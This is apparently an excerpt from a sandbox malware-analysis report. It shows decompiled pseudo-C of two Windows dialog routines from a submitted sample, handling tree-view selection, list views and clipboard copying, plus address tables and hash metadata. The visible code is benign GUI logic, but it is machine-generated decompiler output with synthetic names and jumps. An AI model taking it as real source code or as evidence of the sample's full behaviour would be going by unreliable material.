                          				_t183 =  *0x423eb0; // 0x753e70
                          				_t315 = 0;
                          				_v32 = _t280;
                          				_v20 = _t183 + 0x94;
                          				if(_a8 != 0x110) {
                          					L23:
                          					__eflags = _a8 - 0x405;
                          					if(_a8 != 0x405) {
                          						_t289 = _a16;
                          					} else {
                          						_a12 = _t315;
                          						_t289 = 1;
                          						_a8 = 0x40f;
                          						_a16 = 1;
                          					}
                          					__eflags = _a8 - 0x4e;
                          					if(_a8 == 0x4e) {
                          						L28:
                          						__eflags = _a8 - 0x413;
                          						_v16 = _t289;
                          						if(_a8 == 0x413) {
                          							L30:
                          							__eflags =  *0x423eb9 & 0x00000002;
                          							if(( *0x423eb9 & 0x00000002) != 0) {
                          								L41:
                          								__eflags = _v16 - _t315;
                          								if(_v16 != _t315) {
                          									_t232 = _v16;
                          									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                          									}
                          									_t233 = _v16;
                          									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                          										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                          											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                          											 *_t284 =  *_t284 & 0xffffffdf;
                          											__eflags =  *_t284;
                          										} else {
                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                          										}
                          									}
                          								}
                          								goto L48;
                          							}
                          							__eflags = _a8 - 0x413;
                          							if(_a8 == 0x413) {
                          								L33:
                          								__eflags = _a8 - 0x413;
                          								_t289 = 0 | _a8 != 0x00000413;
                          								_t240 = E004046F2(_v8, _a8 != 0x413);
                          								__eflags = _t240 - _t315;
                          								if(_t240 >= _t315) {
                          									_t93 = _t280 + 8; // 0x8
                          									_t310 = _t240 * 0x418 + _t93;
                          									_t289 =  *_t310;
                          									__eflags = _t289 & 0x00000010;
                          									if((_t289 & 0x00000010) == 0) {
                          										__eflags = _t289 & 0x00000040;
                          										if((_t289 & 0x00000040) == 0) {
                          											_t298 = _t289 ^ 0x00000001;
                          											__eflags = _t298;
                          										} else {
                          											_t300 = _t289 ^ 0x00000080;
                          											__eflags = _t300;
                          											if(_t300 >= 0) {
                          												_t298 = _t300 & 0xfffffffe;
                          											} else {
                          												_t298 = _t300 | 0x00000001;
                          											}
                          										}
                          										 *_t310 = _t298;
                          										E0040117D(_t240);
                          										_t242 =  *0x423eb8; // 0x80
                          										_t289 = 1;
                          										_a8 = 0x40f;
                          										_t245 =  !_t242 >> 0x00000008 & 1;
                          										__eflags = _t245;
                          										_a12 = 1;
                          										_a16 = _t245;
                          									}
                          								}
                          								goto L41;
                          							}
                          							_t289 = _a16;
                          							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                          							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                          								goto L41;
                          							}
                          							goto L33;
                          						}
                          						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                          						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                          							goto L48;
                          						}
                          						goto L30;
                          					} else {
                          						__eflags = _a8 - 0x413;
                          						if(_a8 != 0x413) {
                          							L48:
                          							__eflags = _a8 - 0x111;
                          							if(_a8 != 0x111) {
                          								L56:
                          								__eflags = _a8 - 0x200;
                          								if(_a8 == 0x200) {
                          									SendMessageA(_v8, 0x200, _t315, _t315);
                          								}
                          								__eflags = _a8 - 0x40b;
                          								if(_a8 == 0x40b) {
                          									_t220 =  *0x420474;
                          									__eflags = _t220 - _t315;
                          									if(_t220 != _t315) {
                          										ImageList_Destroy(_t220);
                          									}
                          									_t221 =  *0x42048c;
                          									__eflags = _t221 - _t315;
                          									if(_t221 != _t315) {
                          										GlobalFree(_t221);
                          									}
                          									 *0x420474 = _t315;
                          									 *0x42048c = _t315;
                          									 *0x423f00 = _t315;
                          								}
                          								__eflags = _a8 - 0x40f;
                          								if(_a8 != 0x40f) {
                          									L86:
                          									__eflags = _a8 - 0x420;
                          									if(_a8 == 0x420) {
                          										__eflags =  *0x423eb9 & 0x00000001;
                          										if(( *0x423eb9 & 0x00000001) != 0) {
                          											__eflags = _a16 - 0x20;
                          											_t189 = (0 | _a16 == 0x00000020) << 3;
                          											__eflags = _t189;
                          											_t316 = _t189;
                          											ShowWindow(_v8, _t316);
                          											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                          										}
                          									}
                          									goto L89;
                          								} else {
                          									E004011EF(_t289, _t315, _t315);
                          									__eflags = _a12 - _t315;
                          									if(_a12 != _t315) {
                          										E0040140B(8);
                          									}
                          									__eflags = _a16 - _t315;
                          									if(_a16 == _t315) {
                          										L73:
                          										E004011EF(_t289, _t315, _t315);
                          										__eflags =  *0x423ecc - _t315; // 0x1
                          										_v32 =  *0x42048c;
                          										_t196 =  *0x423ec8; // 0x75401c
                          										_v60 = 0xf030;
                          										_v16 = _t315;
                          										if(__eflags <= 0) {
                          											L84:
                          											InvalidateRect(_v8, _t315, 1);
                          											_t198 =  *0x42367c; // 0x759a19
                          											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                          											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                          												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                          											}
                          											goto L86;
                          										} else {
                          											_t142 = _t196 + 8; // 0x754024
                          											_t281 = _t142;
                          											do {
                          												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                          												__eflags = _t202 - _t315;
                          												if(_t202 != _t315) {
                          													_t291 =  *_t281;
                          													_v68 = _t202;
                          													__eflags = _t291 & 0x00000001;
                          													_v72 = 8;
                          													if((_t291 & 0x00000001) != 0) {
                          														_t151 =  &(_t281[4]); // 0x754034
                          														_v72 = 9;
                          														_v56 = _t151;
                          														_t154 =  &(_t281[0]);
                          														 *_t154 = _t281[0] & 0x000000fe;
                          														__eflags =  *_t154;
                          													}
                          													__eflags = _t291 & 0x00000040;
                          													if((_t291 & 0x00000040) == 0) {
                          														_t206 = (_t291 & 0x00000001) + 1;
                          														__eflags = _t291 & 0x00000010;
                          														if((_t291 & 0x00000010) != 0) {
                          															_t206 = _t206 + 3;
                          															__eflags = _t206;
                          														}
                          													} else {
                          														_t206 = 3;
                          													}
                          													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                          													__eflags = _t294;
                          													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                          													SendMessageA(_v8, 0x1102, _t294, _v68);
                          													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                          												}
                          												_v16 = _v16 + 1;
                          												_t281 =  &(_t281[0x106]);
                          												__eflags = _v16 -  *0x423ecc; // 0x1
                          											} while (__eflags < 0);
                          											goto L84;
                          										}
                          									} else {
                          										_t282 = E004012E2( *0x42048c);
                          										E00401299(_t282);
                          										_t217 = 0;
                          										_t289 = 0;
                          										__eflags = _t282 - _t315;
                          										if(_t282 <= _t315) {
                          											L72:
                          											SendMessageA(_v12, 0x14e, _t289, _t315);
                          											_a16 = _t282;
                          											_a8 = 0x420;
                          											goto L73;
                          										} else {
                          											goto L69;
                          										}
                          										do {
                          											L69:
                          											_t309 = _v20;
                          											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                          											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                          												_t289 = _t289 + 1;
                          												__eflags = _t289;
                          											}
                          											_t217 = _t217 + 1;
                          											__eflags = _t217 - _t282;
                          										} while (_t217 < _t282);
                          										goto L72;
                          									}
                          								}
                          							}
                          							__eflags = _a12 - 0x3f9;
                          							if(_a12 != 0x3f9) {
                          								goto L89;
                          							}
                          							__eflags = _a12 >> 0x10 - 1;
                          							if(_a12 >> 0x10 != 1) {
                          								goto L89;
                          							}
                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                          							__eflags = _t227 - 0xffffffff;
                          							if(_t227 == 0xffffffff) {
                          								goto L89;
                          							}
                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                          							__eflags = _t283 - 0xffffffff;
                          							if(_t283 == 0xffffffff) {
                          								L54:
                          								_t283 = 0x20;
                          								L55:
                          								E00401299(_t283);
                          								SendMessageA(_a4, 0x420, _t315, _t283);
                          								_a12 = 1;
                          								_a16 = _t315;
                          								_a8 = 0x40f;
                          								goto L56;
                          							}
                          							_t231 = _v20;
                          							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                          							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                          								goto L55;
                          							}
                          							goto L54;
                          						}
                          						goto L28;
                          					}
                          				} else {
                          					 *0x423f00 = _a4;
                          					_t247 =  *0x423ecc; // 0x1
                          					_t285 = 2;
                          					_v28 = 0;
                          					_v16 = _t285;
                          					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
                          					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                          					 *0x420480 =  *0x420480 | 0xffffffff;
                          					_v24 = _t250;
                          					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                          					 *0x420474 = _t252;
                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                          					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                          					}
                          					DeleteObject(_v24);
                          					_t286 = 0;
                          					do {
                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                          						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                          							if(_t286 != 0x20) {
                          								_v16 = _t315;
                          							}
                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                          						}
                          						_t286 = _t286 + 1;
                          					} while (_t286 < 0x21);
                          					_t317 = _a16;
                          					_t287 = _v16;
                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                          					_push(0x15);
                          					E00403E37(_a4);
                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                          					_push(0x16);
                          					E00403E37(_a4);
                          					_t318 = 0;
                          					_t288 = 0;
                          					_t328 =  *0x423ecc - _t318; // 0x1
                          					if(_t328 <= 0) {
                          						L19:
                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                          						goto L20;
                          					} else {
                          						_t311 = _v32 + 8;
                          						_v24 = _t311;
                          						do {
                          							_t268 = _t311 + 0x10;
                          							if( *_t268 != 0) {
                          								_v60 = _t268;
                          								_t269 =  *_t311;
                          								_t302 = 0x20;
                          								_v84 = _t288;
                          								_v80 = 0xffff0002;
                          								_v76 = 0xd;
                          								_v64 = _t302;
                          								_v40 = _t318;
                          								_v68 = _t269 & _t302;
                          								if((_t269 & 0x00000002) == 0) {
                          									__eflags = _t269 & 0x00000004;
                          									if((_t269 & 0x00000004) == 0) {
                          										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									} else {
                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                          									}
                          								} else {
                          									_v76 = 0x4d;
                          									_v44 = 1;
                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                          									_v28 = 1;
                          									 *( *0x42048c + _t318 * 4) = _t274;
                          									_t288 =  *( *0x42048c + _t318 * 4);
                          								}
                          							}
                          							_t318 = _t318 + 1;
                          							_t311 = _v24 + 0x418;
                          							_t331 = _t318 -  *0x423ecc; // 0x1
                          							_v24 = _t311;
                          						} while (_t331 < 0);
                          						if(_v28 != 0) {
                          							L20:
                          							if(_v16 != 0) {
                          								E00403E6C(_v8);
                          								_t280 = _v32;
                          								_t315 = 0;
                          								__eflags = 0;
                          								goto L23;
                          							} else {
                          								ShowWindow(_v12, 5);
                          								E00403E6C(_v12);
                          								L89:
                          								return E00403E9E(_a8, _a12, _a16);
                          							}
                          						}
                          						goto L19;
                          					}
                          				}
                          			}






































































                          0x00404790
                          0x00404796
                          0x00404798
                          0x0040479e
                          0x004047a4
                          0x004047a7
                          0x004047b1
                          0x004047ba
                          0x004047bd
                          0x004047c0
                          0x004049e8
                          0x004049e8
                          0x004049ef
                          0x00404a03
                          0x004049f1
                          0x004049f3
                          0x004049f6
                          0x004049f7
                          0x004049fe
                          0x004049fe
                          0x00404a06
                          0x00404a0f
                          0x00404a1a
                          0x00404a1a
                          0x00404a1d
                          0x00404a20
                          0x00404a2f
                          0x00404a2f
                          0x00404a36
                          0x00404aae
                          0x00404aae
                          0x00404ab1
                          0x00404ab3
                          0x00404ab6
                          0x00404abd
                          0x00404acb
                          0x00404acb
                          0x00404acd
                          0x00404ad0
                          0x00404ad7
                          0x00404ad9
                          0x00404add
                          0x00404afa
                          0x00404afe
                          0x00404afe
                          0x00404adf
                          0x00404aec
                          0x00404aec
                          0x00404add
                          0x00404ad7
                          0x00000000
                          0x00404ab1
                          0x00404a38
                          0x00404a3b
                          0x00404a46
                          0x00404a48
                          0x00404a4b
                          0x00404a52
                          0x00404a57
                          0x00404a59
                          0x00404a63
                          0x00404a63
                          0x00404a67
                          0x00404a69
                          0x00404a6c
                          0x00404a6e
                          0x00404a71
                          0x00404a87
                          0x00404a87
                          0x00404a73
                          0x00404a73
                          0x00404a79
                          0x00404a7b
                          0x00404a82
                          0x00404a7d
                          0x00404a7d
                          0x00404a7d
                          0x00404a7b
                          0x00404a8b
                          0x00404a8d
                          0x00404a92
                          0x00404a9b
                          0x00404a9c
                          0x00404aa6
                          0x00404aa6
                          0x00404aa8
                          0x00404aab
                          0x00404aab
                          0x00404a6c
                          0x00000000
                          0x00404a59
                          0x00404a3d
                          0x00404a40
                          0x00404a44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a44
                          0x00404a22
                          0x00404a29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404a11
                          0x00404a11
                          0x00404a14
                          0x00404b01
                          0x00404b01
                          0x00404b08
                          0x00404b7c
                          0x00404b7c
                          0x00404b83
                          0x00404b8f
                          0x00404b8f
                          0x00404b91
                          0x00404b98
                          0x00404b9a
                          0x00404b9f
                          0x00404ba1
                          0x00404ba4
                          0x00404ba4
                          0x00404baa
                          0x00404baf
                          0x00404bb1
                          0x00404bb4
                          0x00404bb4
                          0x00404bba
                          0x00404bc0
                          0x00404bc6
                          0x00404bc6
                          0x00404bcc
                          0x00404bd3
                          0x00404d20
                          0x00404d20
                          0x00404d27
                          0x00404d29
                          0x00404d30
                          0x00404d34
                          0x00404d41
                          0x00404d41
                          0x00404d44
                          0x00404d4a
                          0x00404d5c
                          0x00404d5c
                          0x00404d30
                          0x00000000
                          0x00404bd9
                          0x00404bdb
                          0x00404be0
                          0x00404be3
                          0x00404be7
                          0x00404be7
                          0x00404bec
                          0x00404bef
                          0x00404c30
                          0x00404c32
                          0x00404c3c
                          0x00404c42
                          0x00404c45
                          0x00404c4a
                          0x00404c51
                          0x00404c54
                          0x00404cf6
                          0x00404cfc
                          0x00404d02
                          0x00404d07
                          0x00404d0a
                          0x00404d1b
                          0x00404d1b
                          0x00000000
                          0x00404c5a
                          0x00404c5a
                          0x00404c5a
                          0x00404c5d
                          0x00404c63
                          0x00404c66
                          0x00404c68
                          0x00404c6a
                          0x00404c6c
                          0x00404c6f
                          0x00404c72
                          0x00404c79
                          0x00404c7b
                          0x00404c7e
                          0x00404c85
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c88
                          0x00404c8c
                          0x00404c8f
                          0x00404c9b
                          0x00404c9c
                          0x00404c9f
                          0x00404ca1
                          0x00404ca1
                          0x00404ca1
                          0x00404c91
                          0x00404c93
                          0x00404c93
                          0x00404cc0
                          0x00404cc0
                          0x00404cc1
                          0x00404ccd
                          0x00404cdc
                          0x00404cdc
                          0x00404cde
                          0x00404ce1
                          0x00404cea
                          0x00404cea
                          0x00000000
                          0x00404c5d
                          0x00404bf1
                          0x00404bfc
                          0x00404bff
                          0x00404c04
                          0x00404c06
                          0x00404c08
                          0x00404c0a
                          0x00404c1a
                          0x00404c24
                          0x00404c26
                          0x00404c29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404c0c
                          0x00404c0c
                          0x00404c0c
                          0x00404c0f
                          0x00404c12
                          0x00404c14
                          0x00404c14
                          0x00404c14
                          0x00404c15
                          0x00404c16
                          0x00404c16
                          0x00000000
                          0x00404c0c
                          0x00404bef
                          0x00404bd3
                          0x00404b0a
                          0x00404b10
                          0x00000000
                          0x00000000
                          0x00404b1c
                          0x00404b20
                          0x00000000
                          0x00000000
                          0x00404b30
                          0x00404b32
                          0x00404b35
                          0x00000000
                          0x00000000
                          0x00404b47
                          0x00404b49
                          0x00404b4c
                          0x00404b56
                          0x00404b58
                          0x00404b59
                          0x00404b5a
                          0x00404b69
                          0x00404b6b
                          0x00404b72
                          0x00404b75
                          0x00000000
                          0x00404b75
                          0x00404b4e
                          0x00404b51
                          0x00404b54
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404b54
                          0x00000000
                          0x00404a14
                          0x004047c6
                          0x004047cb
                          0x004047d0
                          0x004047d5
                          0x004047d6
                          0x004047df
                          0x004047ea
                          0x004047f5
                          0x004047fb
                          0x00404809
                          0x0040481e
                          0x00404823
                          0x0040482e
                          0x00404837
                          0x0040484c
                          0x0040485d
                          0x0040486a
                          0x0040486a
                          0x0040486f
                          0x00404875
                          0x00404877
                          0x0040487a
                          0x0040487f
                          0x00404884
                          0x00404886
                          0x00404886
                          0x004048a6
                          0x004048a6
                          0x004048a8
                          0x004048a9
                          0x004048ae
                          0x004048b1
                          0x004048b4
                          0x004048b8
                          0x004048bd
                          0x004048c2
                          0x004048c6
                          0x004048cb
                          0x004048d0
                          0x004048d2
                          0x004048d4
                          0x004048da
                          0x004049a4
                          0x004049b7
                          0x00000000
                          0x004048e0
                          0x004048e3
                          0x004048e6
                          0x004048e9
                          0x004048e9
                          0x004048ef
                          0x004048f5
                          0x004048f8
                          0x004048fe
                          0x004048ff
                          0x00404904
                          0x0040490d
                          0x00404914
                          0x00404917
                          0x0040491a
                          0x0040491d
                          0x00404957
                          0x00404959
                          0x00404982
                          0x0040495b
                          0x00404968
                          0x00404968
                          0x0040491f
                          0x00404922
                          0x00404931
                          0x0040493b
                          0x00404943
                          0x0040494a
                          0x00404952
                          0x00404952
                          0x0040491d
                          0x00404988
                          0x00404989
                          0x0040498f
                          0x00404995
                          0x00404995
                          0x004049a2
                          0x004049bd
                          0x004049c1
                          0x004049de
                          0x004049e3
                          0x004049e6
                          0x004049e6
                          0x00000000
                          0x004049c3
                          0x004049c8
                          0x004049d1
                          0x00404d5e
                          0x00404d70
                          0x00404d70
                          0x004049c1
                          0x00000000
                          0x004049a2
                          0x004048da

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N$p>u
                          • API String ID: 1638840714-1575846375
                          • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                          • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                          • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                          				struct HWND__* _v8;
                          				long _v12;
                          				struct tagRECT _v28;
                          				void* _v36;
                          				signed int _v40;
                          				int _v44;
                          				int _v48;
                          				signed int _v52;
                          				int _v56;
                          				void* _v60;
                          				void* _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				long _t87;
                          				unsigned int _t92;
                          				unsigned int _t93;
                          				int _t94;
                          				int _t95;
                          				long _t98;
                          				void* _t101;
                          				intOrPtr _t112;
                          				intOrPtr _t123;
                          				struct HWND__* _t127;
                          				int _t149;
                          				int _t150;
                          				struct HWND__* _t154;
                          				struct HWND__* _t158;
                          				struct HMENU__* _t160;
                          				long _t162;
                          				void* _t163;
                          				short* _t164;
                          
                          				_t154 =  *0x423684; // 0x0
                          				_t149 = 0;
                          				_v8 = _t154;
                          				if(_a8 != 0x110) {
                          					__eflags = _a8 - 0x405;
                          					if(_a8 == 0x405) {
                          						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                          					}
                          					__eflags = _a8 - 0x111;
                          					if(_a8 != 0x111) {
                          						L17:
                          						__eflags = _a8 - 0x404;
                          						if(_a8 != 0x404) {
                          							L25:
                          							__eflags = _a8 - 0x7b;
                          							if(_a8 != 0x7b) {
                          								goto L20;
                          							}
                          							__eflags = _a12 - _t154;
                          							if(_a12 != _t154) {
                          								goto L20;
                          							}
                          							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                          							__eflags = _t87 - _t149;
                          							_a8 = _t87;
                          							if(_t87 <= _t149) {
                          								L37:
                          								return 0;
                          							}
                          							_t160 = CreatePopupMenu();
                          							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                          							_t92 = _a16;
                          							__eflags = _t92 - 0xffffffff;
                          							if(_t92 != 0xffffffff) {
                          								_t150 = _t92;
                          								_t93 = _t92 >> 0x10;
                          								__eflags = _t93;
                          								_t94 = _t93;
                          							} else {
                          								GetWindowRect(_t154,  &_v28);
                          								_t150 = _v28.left;
                          								_t94 = _v28.top;
                          							}
                          							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                          							_t162 = 1;
                          							__eflags = _t95 - 1;
                          							if(_t95 == 1) {
                          								_v60 = _t149;
                          								_v48 = 0x420498;
                          								_v44 = 0xfff;
                          								_a4 = _a8;
                          								do {
                          									_a4 = _a4 - 1;
                          									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                          									__eflags = _a4 - _t149;
                          									_t162 = _t162 + _t98 + 2;
                          								} while (_a4 != _t149);
                          								OpenClipboard(_t149);
                          								EmptyClipboard();
                          								_t101 = GlobalAlloc(0x42, _t162);
                          								_a4 = _t101;
                          								_t163 = GlobalLock(_t101);
                          								do {
                          									_v48 = _t163;
                          									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                          									 *_t164 = 0xa0d;
                          									_t163 = _t164 + 2;
                          									_t149 = _t149 + 1;
                          									__eflags = _t149 - _a8;
                          								} while (_t149 < _a8);
                          								GlobalUnlock(_a4);
                          								SetClipboardData(1, _a4);
                          								CloseClipboard();
                          							}
                          							goto L37;
                          						}
                          						__eflags =  *0x42366c - _t149; // 0x0
                          						if(__eflags == 0) {
                          							ShowWindow( *0x423ea8, 8);
                          							__eflags =  *0x423f2c - _t149; // 0x0
                          							if(__eflags == 0) {
                          								_t112 =  *0x41fc68; // 0x0
                          								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                          							}
                          							E00403E10(1);
                          							goto L25;
                          						}
                          						 *0x41f860 = 2;
                          						E00403E10(0x78);
                          						goto L20;
                          					} else {
                          						__eflags = _a12 - 0x403;
                          						if(_a12 != 0x403) {
                          							L20:
                          							return E00403E9E(_a8, _a12, _a16);
                          						}
                          						ShowWindow( *0x423670, _t149);
                          						ShowWindow(_t154, 8);
                          						E00403E6C(_t154);
                          						goto L17;
                          					}
                          				}
                          				_v52 = _v52 | 0xffffffff;
                          				_v40 = _v40 | 0xffffffff;
                          				_v60 = 2;
                          				_v56 = 0;
                          				_v48 = 0;
                          				_v44 = 0;
                          				asm("stosd");
                          				asm("stosd");
                          				_t123 =  *0x423eb0; // 0x753e70
                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                          				 *0x423670 = GetDlgItem(_a4, 0x403);
                          				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                          				_t127 = GetDlgItem(_a4, 0x3f8);
                          				 *0x423684 = _t127;
                          				_v8 = _t127;
                          				E00403E6C( *0x423670);
                          				 *0x423674 = E004046C5(4);
                          				 *0x42368c = 0;
                          				GetClientRect(_v8,  &_v28);
                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                          				if(_a8 >= 0) {
                          					SendMessageA(_v8, 0x1001, 0, _a8);
                          					SendMessageA(_v8, 0x1026, 0, _a8);
                          				}
                          				if(_a12 >= _t149) {
                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                          				}
                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                          				_push(0x1b);
                          				E00403E37(_a4);
                          				if(( *0x423eb8 & 0x00000003) != 0) {
                          					ShowWindow( *0x423670, _t149);
                          					if(( *0x423eb8 & 0x00000002) != 0) {
                          						 *0x423670 = _t149;
                          					} else {
                          						ShowWindow(_v8, 8);
                          					}
                          					E00403E6C( *0x423668);
                          				}
                          				_t158 = GetDlgItem(_a4, 0x3ec);
                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                          				if(( *0x423eb8 & 0x00000004) != 0) {
                          					SendMessageA(_t158, 0x409, _t149, _a12);
                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                          				}
                          				goto L37;
                          			}



































                          0x00404f6a
                          0x00404f70
                          0x00404f79
                          0x00404f7c
                          0x0040510d
                          0x00405114
                          0x00405138
                          0x00405138
                          0x0040513e
                          0x0040514b
                          0x00405169
                          0x00405169
                          0x00405170
                          0x004051c7
                          0x004051c7
                          0x004051cb
                          0x00000000
                          0x00000000
                          0x004051cd
                          0x004051d0
                          0x00000000
                          0x00000000
                          0x004051da
                          0x004051e0
                          0x004051e2
                          0x004051e5
                          0x004052de
                          0x00000000
                          0x004052de
                          0x004051f4
                          0x00405200
                          0x00405206
                          0x00405209
                          0x0040520c
                          0x00405221
                          0x00405224
                          0x00405224
                          0x00405227
                          0x0040520e
                          0x00405213
                          0x00405219
                          0x0040521c
                          0x0040521c
                          0x00405237
                          0x0040523f
                          0x00405240
                          0x00405242
                          0x0040524b
                          0x0040524e
                          0x00405255
                          0x0040525c
                          0x00405264
                          0x00405264
                          0x00405272
                          0x00405278
                          0x0040527b
                          0x0040527b
                          0x00405282
                          0x00405288
                          0x00405291
                          0x00405298
                          0x004052a1
                          0x004052a3
                          0x004052a6
                          0x004052b5
                          0x004052b7
                          0x004052bd
                          0x004052be
                          0x004052bf
                          0x004052bf
                          0x004052c7
                          0x004052d2
                          0x004052d8
                          0x004052d8
                          0x00000000
                          0x00405242
                          0x00405172
                          0x00405178
                          0x004051a8
                          0x004051aa
                          0x004051b0
                          0x004051b2
                          0x004051bb
                          0x004051bb
                          0x004051c2
                          0x00000000
                          0x004051c2
                          0x0040517c
                          0x00405186
                          0x00000000
                          0x0040514d
                          0x0040514d
                          0x00405153
                          0x0040518b
                          0x00000000
                          0x00405194
                          0x0040515c
                          0x00405161
                          0x00405164
                          0x00000000
                          0x00405164
                          0x0040514b
                          0x00404f82
                          0x00404f86
                          0x00404f8f
                          0x00404f96
                          0x00404f99
                          0x00404f9c
                          0x00404f9f
                          0x00404fa0
                          0x00404fa1
                          0x00404fba
                          0x00404fbd
                          0x00404fc7
                          0x00404fd6
                          0x00404fde
                          0x00404fe6
                          0x00404feb
                          0x00404fee
                          0x00404ffa
                          0x00405003
                          0x0040500c
                          0x0040502f
                          0x00405035
                          0x00405046
                          0x0040504b
                          0x00405059
                          0x00405067
                          0x00405067
                          0x0040506c
                          0x0040507a
                          0x0040507a
                          0x0040507f
                          0x00405082
                          0x00405087
                          0x00405093
                          0x0040509c
                          0x004050a9
                          0x004050b8
                          0x004050ab
                          0x004050b0
                          0x004050b0
                          0x004050c4
                          0x004050c4
                          0x004050d8
                          0x004050e1
                          0x004050ea
                          0x004050fa
                          0x00405106
                          0x00405106
                          0x00000000

                          APIs
                          • GetDlgItem.USER32 ref: 00404FC0
                          • GetDlgItem.USER32 ref: 00404FCF
                          • GetClientRect.USER32 ref: 0040500C
                          • GetSystemMetrics.USER32 ref: 00405014
                          • SendMessageA.USER32 ref: 00405035
                          • SendMessageA.USER32 ref: 00405046
